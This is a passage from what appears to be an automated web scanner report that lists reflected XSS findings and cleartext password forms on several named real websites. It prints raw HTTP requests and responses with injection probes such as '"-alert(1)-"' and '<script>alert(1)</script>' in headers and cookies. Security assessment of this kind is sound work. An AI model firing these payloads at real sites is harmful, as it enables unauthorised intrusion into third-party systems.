Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=6c070"><a>4421a84236f

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: OFFICE=;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=6c070"><a>4421a84236f">
...[SNIP]...

4.341. http://www.arnoldporter.com/search.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /search.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 997bb"><a>c1452cc4d4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /search.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=997bb"><a>c1452cc4d4

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Search Form</title>
       <meta name="Description" cont
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=997bb"><a>c1452cc4d4">
...[SNIP]...

4.342. http://www.arnoldporter.com/sitemap.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /sitemap.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91afd"><a>22110ca1882 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sitemap.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=91afd"><a>22110ca1882

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=91afd"><a>22110ca1882">
...[SNIP]...

4.343. http://www.fulbright.com/index.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605f4"><a>5f16750633f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Referer: http://www.google.com/search?hl=en&q=605f4"><a>5f16750633f

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:50:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A01%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D780%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:01 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=605f4"><a>5f16750633f">
...[SNIP]...

4.344. http://www.kasimer-ittig.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kasimer-ittig.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d539"-alert(1)-"d98fb76f347 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.kasimer-ittig.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5d539"-alert(1)-"d98fb76f347

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 16:52:09 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=643af9d73a9ecb39bcb4be81c5fe87a828471291; path=/; expires=Wed, 19-Jan-2011 17:52:09 GMT
Content-Length: 45591
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
"+ads[i].url+"' onclick='ajax_click(\""+ads[i].visible_url+"\",\"kasimer-ittig.com\",\"557011403\",\"0\", \""+ads[i].line1+"\",\""+ads[i].line2+"\",\""+(i+1)+"\",\"http://www.google.com/search?hl=en&q=5d539"-alert(1)-"d98fb76f347\",\"Test_B_5\",\"0\")'");
ad_html = ad_html.replace("<-ad.LINE1->
...[SNIP]...

4.345. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11e39"-alert(1)-"c7efa5beb18 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~01041111e39"-alert(1)-"c7efa5beb18; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1479B1099,2#668902|0,1,1;expires=Fri, 18 Feb 2011 18:01:17 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=509
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:01:17 GMT
Connection: close
Content-Length: 2115

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
d='INmz6woBADYAAHrQ5V4AAACH~01041111e39"-alert(1)-"c7efa5beb18';

var zzhasAd=undefined;


                                                               var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~01041111e39"-alert(1)-"c7efa5beb18;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.346. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b03b"-alert(1)-"d9b6e79ead6 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104112b03b"-alert(1)-"d9b6e79ead6; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:01:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=526
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:01:00 GMT
Connection: close
Content-Length: 2035

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104112b03b"-alert(1)-"d9b6e79ead6';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~0104112b03b"-alert(1)-"d9b6e79ead6;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.347. http://lt.navegg.com/g.lt [ltcid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lt.navegg.com
Path:   /g.lt

Issue detail

The value of the ltcid cookie is copied into the HTML document as plain text between tags. The payload 4bf45<script>alert(1)</script>08862fae6c1 was submitted in the ltcid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /g.lt?nvst=12596&nvtt=z&nvup=1&nvgpflid=547362597 HTTP/1.1
Host: lt.navegg.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ltcid=5473625974bf45<script>alert(1)</script>08862fae6c1

Response

HTTP/1.1 200 OK
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Set-Cookie: inf= ; path=/; domain=.navegg.com; expires=Wed, 20-Jan-2011 06:01:20 GMT
Content-type: application/javascript
Date: Wed, 19 Jan 2011 18:01:20 GMT
Server: lighttpd/1.4.19
Content-Length: 84

tuple=" ";
ltload();
ltsetid("5473625974bf45<script>alert(1)</script>08862fae6c1");

5. Cleartext submission of password  previous  next
There are 19 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://dcregistry.com/wbn/welcome.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /wbn/welcome.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /wbn/welcome.html HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:20:53 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 49869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<td>
<form method="post"
action="http://dcregistry.com/cgi-bin/wbn2/wbn_admin.pl">

<center>
...[SNIP]...
<td>
<input type="password" name="password"
size="22" value="" maxlength="20" />
<br />
...[SNIP]...

5.2. http://dcregistry.com/wbn/welcome.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /wbn/welcome.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /wbn/welcome.html HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:20:53 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 49869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<td>
<form method="post"
action="http://dcregistry.com/cgi-bin/wbn/wbn_admin.pl">

<center>
...[SNIP]...
<td>
<input type="password" name="password"
size="22" value="" maxlength="20" />

<p>
...[SNIP]...

5.3. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /magazines/fortune/bestcompanies/2010/snapshots/65.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:25:12 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Wed, 19 Jan 2011 15:26:12 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 75163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title>
<meta HTTP-EQUIV="Pragma" CONTENT="no-c
...[SNIP]...
<!-- start reset password -->    
           <form id="cnnConnectFormReset" class="overlay_content">
               <a href="javascript:void(0)" class="close">
...[SNIP]...
</p>
               <input type="password" id="new_password" name="newPassword">
               <div id="cnnConnectResetErrors">
...[SNIP]...

5.4. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /magazines/fortune/bestcompanies/2010/snapshots/65.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:25:12 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Wed, 19 Jan 2011 15:26:12 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 75163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title>
<meta HTTP-EQUIV="Pragma" CONTENT="no-c
...[SNIP]...
<!-- start login -->
           <form onsubmit="return false;" id="cnnMoneyConnectFormLogin" class="overlay_content">
               <a href="javascript:void(0)" class="close">
...[SNIP]...
</p>
               <input class="" id="passwordinput" name="password" type="password">
               <div id="cnnConnectLoginErrors" style="display: none;">
...[SNIP]...

5.5. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /magazines/fortune/bestcompanies/2010/snapshots/65.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:25:12 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Wed, 19 Jan 2011 15:26:12 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 75163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title>
<meta HTTP-EQUIV="Pragma" CONTENT="no-c
...[SNIP]...
<!-- start registration -->    
           <form onsubmit="return false;" id="cnnConnectFormRegister" class="overlay_content">
               <a href="javascript:void(0)" class="close">
...[SNIP]...
</p>
               <input id="signup_password" name="password" maxlength="10" type="password" />
               <span class="fieldTip">
...[SNIP]...

5.6. http://www.fulbright.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
